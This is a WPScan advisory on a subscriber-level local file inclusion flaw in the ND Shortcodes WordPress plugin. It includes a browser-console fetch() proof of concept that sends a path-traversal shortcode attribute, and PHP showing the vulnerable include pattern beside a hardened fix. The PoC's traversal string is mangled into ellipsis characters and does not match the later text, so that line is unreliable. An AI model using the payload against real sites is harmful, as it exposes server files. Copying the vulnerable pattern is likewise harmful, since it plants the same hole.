WPVDB-ID: 0805ED7E-395D-48DE-B484-6C3EC1CD4B8E
History: Jun 12, 2023 - 12:00 a.m.

ND Shortcodes < 7.0 - Subscriber+ LFI

wpscan.com
Tags: security vulnerability, shortcode validation, LFI attack, WordPress plugin

EPSS: 0.001 (percentile 32.1%)

The plugin does not validate some shortcode attributes before using them to build file paths that are passed to include function(s). Because shortcodes can be rendered by any logged-in user through a core admin-ajax action, any authenticated user, such as a subscriber, can supply a path-traversal value in the attribute and perform LFI (local file inclusion) attacks.

PoC

Run the command below in the developer console of the web browser while logged in to the blog as a subscriber; it includes the index.php file at the root of the blog:

    // parse-media-shortcode is a core admin-ajax action that renders the submitted shortcode.
    // "credentials": "include" sends the logged-in subscriber's cookies with the request.
    fetch("/wp-admin/admin-ajax.php", {
      "headers": {
        "content-type": "application/x-www-form-urlencoded",
      },
      "method": "POST",
      "body": "action=parse-media-shortcode&shortcode=[nd_options_testimonial nd_options_layout='…/…/…/…/…/…/index']",
      "credentials": "include"
    }).then(response => response.text())
      .then(data => console.log(data));

Numerous shortcodes were affected by this.
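To make the root cause behind the description and the PoC concrete, here is an added, hypothetical shortcode handler in PHP. It is illustrative code written for this page, not the plugin's own source; the function names, the layouts/ directory and the allowed layout names are assumptions. The first function shows the unvalidated include pattern, the second a hardened version that only accepts a fixed set of layout names and then confirms the resolved file still lives inside the plugin's layouts directory.

```php
<?php
// Illustrative code added to this advisory; not the plugin's source.
// Function names, the 'layouts' directory and the allowed layout names are assumed.

// Vulnerable pattern: the shortcode attribute flows straight into the include path.
// A traversal sequence such as '../../index' in nd_options_layout escapes the
// layouts directory, so an arbitrary .php file on the server gets included.
function example_vulnerable_testimonial_shortcode( $atts ) {
	$atts = shortcode_atts(
		array( 'nd_options_layout' => 'layout-1' ),
		$atts,
		'nd_options_testimonial'
	);

	ob_start();
	include plugin_dir_path( __FILE__ ) . 'layouts/' . $atts['nd_options_layout'] . '.php';
	return ob_get_clean();
}

// Hardened pattern: allowlist the attribute first, then verify the resolved path.
function example_hardened_testimonial_shortcode( $atts ) {
	$atts = shortcode_atts(
		array( 'nd_options_layout' => 'layout-1' ),
		$atts,
		'nd_options_testimonial'
	);

	// 1. Accept only known layout names (assumed set); anything else falls back
	//    to the default instead of reaching the filesystem.
	$allowed = array( 'layout-1', 'layout-2', 'layout-3' );
	$layout  = (string) $atts['nd_options_layout'];
	if ( ! in_array( $layout, $allowed, true ) ) {
		$layout = 'layout-1';
	}

	// 2. Defence in depth: resolve both paths and require the file to sit
	//    under layouts/. realpath() returns false for a missing file, and the
	//    prefix check (with trailing separator) defeats any remaining traversal.
	$base = realpath( plugin_dir_path( __FILE__ ) . 'layouts' );
	$file = realpath( $base . DIRECTORY_SEPARATOR . $layout . '.php' );
	if ( false === $base || false === $file
		|| 0 !== strpos( $file, $base . DIRECTORY_SEPARATOR ) ) {
		return '';
	}

	ob_start();
	include $file;
	return ob_get_clean();
}

add_shortcode( 'nd_options_testimonial', 'example_hardened_testimonial_shortcode' );
```

The allowlist alone closes the bug; the realpath() prefix check is there so that a future layout name containing a slash or dot sequence cannot reintroduce it. Either way, the attribute value itself is never concatenated into a path that is handed to include.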

